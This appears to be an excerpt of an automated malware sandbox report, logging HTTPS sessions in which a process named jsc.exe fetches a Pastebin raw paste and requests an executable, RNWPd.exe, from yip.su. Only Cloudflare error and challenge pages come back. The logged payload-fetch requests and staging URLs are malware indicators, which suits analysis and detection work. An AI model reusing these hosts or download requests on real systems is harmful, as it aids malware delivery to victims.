                                    Data Ascii: gN3P7YdWykkZhm9TtRoknyMUdZjlNRScISrO.aOGsHgO61XXCTPBvhjDXzrZLW_GrYdl0gSBHA9gS2ossnSM3HF94Je9cChYGtE_Sh0BmjJCKwyM3nmYgLl4M335tnJ2rsaGpNGFSIo2fx9ODLmnjyJ_qCpg90T3lybuEGrMNuQT3jSZd9Eykysxge0uB1oWRFV0AsUD77cb9QQUsZ7z5OWfBmpUfygTtk.vjrJx5NvICuOMPlBBqQZ0qVqYloW


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.549745104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:08 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:08 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfc9ddd20c341-EWR
                                    2024-08-17 22:09:08 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:08 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:09:08 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:08 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.549746188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:09 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:09 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:09 UTC693INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6d 32 59 58 6d 78 50 47 4b 6d 6c 41 42 4a 63 55 51 52 68 50 51 70 75 42 35 55 56 70 6e 63 31 6a 77 53 46 59 42 6c 2b 68 6a 32 78 2f 75 72 47 64 41 42 35 6f 6c 68 37 31 78 71 6a 32 68 57 6d 68 6e 54 62 4d 56 50 57 71 54 67 76 42 33 52 41 47 75 51 56 66 58 71 50 74 68 53 75 73 64 4e 76 31 54 68 33 74 6c 4b 64 67 46 58 6f 3d 24 38 48 5a 56 33 43 44 43 4f 61 76 41 77 6d 50 65 74 54 2b 42 68 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: m2YXmxPGKmlABJcUQRhPQpuB5UVpnc1jwSFYBl+hj2x/urGdAB5olh71xqj2hWmhnTbMVPWqTgvB3RAGuQVfXqPthSusdNv1Th3tlKdgFXo=$8HZV3CDCOavAwmPetT+Bhg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:09 UTC760INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:09 UTC1369INData Raw: 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33
                                    Data Ascii: line}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3
                                    2024-08-17 22:09:09 UTC1369INData Raw: 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74
                                    Data Ascii: den}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font
                                    2024-08-17 22:09:09 UTC1369INData Raw: 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20
                                    Data Ascii: LjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring
                                    2024-08-17 22:09:09 UTC1369INData Raw: 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f
                                    Data Ascii: g4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transitio
                                    2024-08-17 22:09:09 UTC1369INData Raw: 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d
                                    Data Ascii: EtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uM
                                    2024-08-17 22:09:09 UTC1369INData Raw: 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65
                                    Data Ascii: -size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5re
                                    2024-08-17 22:09:09 UTC1369INData Raw: 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67
                                    Data Ascii: igh-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding
                                    2024-08-17 22:09:09 UTC1369INData Raw: 37 72 48 6b 65 6e 4d 77 50 38 50 4d 54 64 6b 72 52 6a 71 72 45 73 46 62 33 33 72 45 32 4e 53 6b 4b 57 78 6e 41 36 65 4d 73 69 50 33 73 59 6b 47 6f 63 4b 68 49 62 6d 2e 68 4b 6f 39 34 61 63 75 66 45 4c 63 50 2e 66 58 4a 53 4e 77 70 67 58 43 36 4e 4e 4f 32 52 62 49 42 77 50 6e 7a 44 32 51 78 38 55 38 4d 54 50 59 36 46 32 31 36 46 63 31 68 79 45 6c 78 43 61 6f 44 76 7a 77 48 32 4b 73 53 34 49 5a 4f 37 68 2e 4b 45 51 6d 55 68 59 6d 6b 56 4e 47 41 52 74 49 31 36 6e 46 61 31 6b 58 67 42 61 2e 62 72 50 74 75 77 30 32 72 4a 38 43 57 59 7a 6a 62 4e 2e 36 71 62 56 48 77 59 49 39 50 52 74 73 48 76 51 49 63 64 34 49 77 42 66 30 43 55 75 5f 61 48 36 6a 31 34 51 6b 38 7a 68 79 78 4e 51 61 33 6a 72 72 30 73 4a 4e 62 44 61 77 70 62 74 4e 54 30 58 57 78 66 36 6a 58 6f 4e
                                    Data Ascii: 7rHkenMwP8PMTdkrRjqrEsFb33rE2NSkKWxnA6eMsiP3sYkGocKhIbm.hKo94acufELcP.fXJSNwpgXC6NNO2RbIBwPnzD2Qx8U8MTPY6F216Fc1hyElxCaoDvzwH2KsS4IZO7h.KEQmUhYmkVNGARtI16nFa1kXgBa.brPtuw02rJ8CWYzjbN.6qbVHwYI9PRtsHvQIcd4IwBf0CUu_aH6j14Qk8zhyxNQa3jrr0sJNbDawpbtNT0XWxf6jXoN


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.549748104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:14 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:14 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfcc21f7ac46d-EWR
                                    2024-08-17 22:09:14 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:14 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
